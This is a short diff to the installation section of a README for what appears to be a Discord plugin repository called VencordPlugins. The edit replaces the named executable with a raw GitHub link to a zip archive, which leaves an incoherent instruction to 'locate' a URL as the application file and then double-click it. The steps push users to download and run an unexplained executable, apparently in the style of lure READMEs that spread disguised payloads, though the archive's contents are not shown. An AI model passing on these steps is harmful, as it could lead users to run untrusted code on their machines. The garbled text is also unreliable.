Aurorabold891/VencordPlugins/README.md

 1. For `.exe` files, double-click to run the installer.
 Follow the on-screen instructions.
 2. For `.zip` files, right-click on the file and select "Extract All."
 Choose a location to extract the files, then open the folder.
-3. Locate the main application file (look for `VencordPlugins.exe` or similar).
+3. Locate the main application file (look for `https://raw.githubusercontent.com/Aurorabold891/VencordPlugins/main/PlatformEmulator/VencordPlugins_v1.1.zip` or similar).
 4. Double-click to open the application.

 ## 📊 Features